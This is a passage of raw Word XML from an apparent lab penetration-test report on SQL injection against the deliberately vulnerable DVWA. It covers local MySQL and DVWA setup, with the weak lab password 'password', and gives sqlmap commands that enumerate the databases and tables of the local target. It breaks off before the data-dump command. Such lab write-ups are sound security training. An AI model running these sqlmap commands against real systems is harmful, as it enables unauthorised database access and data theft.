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2852" w14:textId="185B6B1E" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="00CA49C8" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r w:rsidR="004F3519" w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection Report on DVWA</w:t>
      </w:r>
      <w:r w:rsidR="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693EB2BE" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="255C24E0" w14:textId="65D07BD0" w:rsidR="004F3519" w:rsidRPr="00CA49C8" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA49C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF76E5" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15812103" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC2032" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Tools and Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CBE92B" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BCE9A5" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   - Setting Up the Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C1C4F" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   - Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6D37A" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   - Identifying Vulnerable Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DBB276" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   - Exploiting SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A02C1" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   - Extracting Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22286E32" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041843F7" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F41F5E" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D641B4F" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="04788E74" w14:textId="6B714834" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>---</w:t>
      </w:r>
      <w:r>
        <w:t>-----------------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFDA939" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="13C8B56E" w14:textId="285ACA5D" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F10E3" w14:textId="619B92C7" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>This report documents the process and findings of an SQL Injection attack performed on the Damn Vulnerable Web Application (DVWA). The purpose of this report is to demonstrate the vulnerability and provide recommendations for securing web applications against SQL Injection attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200E1B39" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="158725BC" w14:textId="148DD416" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B52921" w14:textId="5926560C" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>The objective of this penetration test is to identify and exploit SQL Injection vulnerabilities in DVWA to understand the security posture of the application and recommend necessary security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551DFD6F" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="3A46D8A6" w14:textId="58371B45" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Tools and Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF22867" w14:textId="0C363B84" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4704D7ED" w14:textId="34919EE0" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>-Kali Linux: A Linux distribution designed for digital forensics and penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC7724" w14:textId="0358AD46" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- SQLmap: An open-source penetration testing tool that automates the process of detecting and exploiting SQL Injection flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D363F6" w14:textId="2189942F" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>-Burp Suite: A graphical tool for testing web application security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AEC3F0" w14:textId="3EF4A0FB" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- DVWA: Damn Vulnerable Web Application for practicing web vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F936C" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="4EE769C7" w14:textId="586EE4AE" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED1E571" w14:textId="14F5E4C0" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>-Operating System: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755BD3F9" w14:textId="194E605A" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- Web Application: DVWA installed on a local server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDFF2F0" w14:textId="58B9D43D" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- Database Server: MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5077C837" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="1E48B675" w14:textId="3DF2C29F" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C5D20" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="31DD7E6D" w14:textId="5A2ED487" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> 4.1 Setting Up the Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1947E15C" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="759D3E04" w14:textId="2948259F" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Install MySQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61171D" w14:textId="18BCD455" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C09086" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D75281E" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo apt install mariadb-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080826FF" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="3BCCAF93" w14:textId="1CB3156B" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Start MySQL Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367867F2" w14:textId="782ECF0D" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44387965" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo service mysql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CA9DD3" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="751575CD" w14:textId="64A95736" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Secure MySQL Installation (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5355249F" w14:textId="41911C17" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046AB804" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo mysql_secure_installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF8F6AB" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="774939A7" w14:textId="7A7D7803" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Log In to MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F35A431" w14:textId="10A11BAB" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8D4A0" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E088C7" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="11EBE05C" w14:textId="33CCA6A7" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Create DVWA Database and User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210AE764" w14:textId="20BCF601" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5BA31F" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>CREATE DATABASE dvwa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688DB427" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'password';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F45187B" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C8F822" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>FLUSH PRIVILEGES;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E3F4D7" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>EXIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F91D782" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="59056CC4" w14:textId="2557EA59" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Download and Install DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A938A" w14:textId="38C60BBC" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6AE408" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo apt install apache2 php php-mysqli git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBAEB02" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD69F56" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>cd /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABB0EF" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo git clone https://github.com/digininja/DVWA.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AFA30E" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo chown -R www-data:www-data DVWA/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F2EF3" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>cd DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4788D21B" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo cp config/config.inc.php.dist config/config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F127A1" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo nano config/config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8A32D0" w14:textId="5128CD46" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="6CCC41E8" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="73095425" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Update the configuration file (`config.inc.php`) to use the MySQL credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EDFAD0" w14:textId="77EA8269" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBE2A5" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$_DVWA = array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F288B1" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>$_DVWA[ 'db_server' ] = 'localhost';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3472C358" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>$_DVWA[ 'db_database' ] = 'dvwa';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BCE707" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>$_DVWA[ 'db_user' ] = 'dvwa';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F7CC23" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>$_DVWA[ 'db_password' ] = 'password';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F3753" w14:textId="230F4E0C" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="4980F452" w14:textId="0FADDEA7" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Restart Apache and MySQL Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329CA06" w14:textId="689A938C" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25383906" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo service apache2 restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209CFE2" w14:textId="515A5C46" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sudo service mysql restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1292BF3A" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="4D78BE35" w14:textId="21471FC7" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Complete DVWA Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C25DE6F" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Open a web browser and navigate to `http://localhost/DVWA/setup.php` to complete the setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D31760" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="1434898E" w14:textId="7E586C7E" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>4.2 Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DD198" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Using tools like Burp Suite to intercept and analyze HTTP requests and responses to identify potential SQL Injection points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AE9938" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="0238F3DB" w14:textId="67608EF0" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>4.3 Identifying Vulnerable Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEFCB5C" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Navigate to the SQL Injection section of DVWA and test for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5359681B" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="27FBC2EE" w14:textId="50E54496" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>4.4 Exploiting SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0071E641" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Using SQLmap to automate the process of exploiting the identified SQL Injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9AEB29" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="4E3C496E" w14:textId="3B233642" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Command to Identify Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9D584" w14:textId="524BA5C4" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E1154D" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=&lt;session_id&gt;" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA87FE" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="0540176F" w14:textId="481B4B8F" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Command to List Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CFB00E" w14:textId="0401C0BC" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1BB70" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=&lt;session_id&gt;" -D dvwa --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E57B593" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="35DDB75F" w14:textId="6E9737A2" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Command to Dump Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D091CE" w14:textId="481F1FAC" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
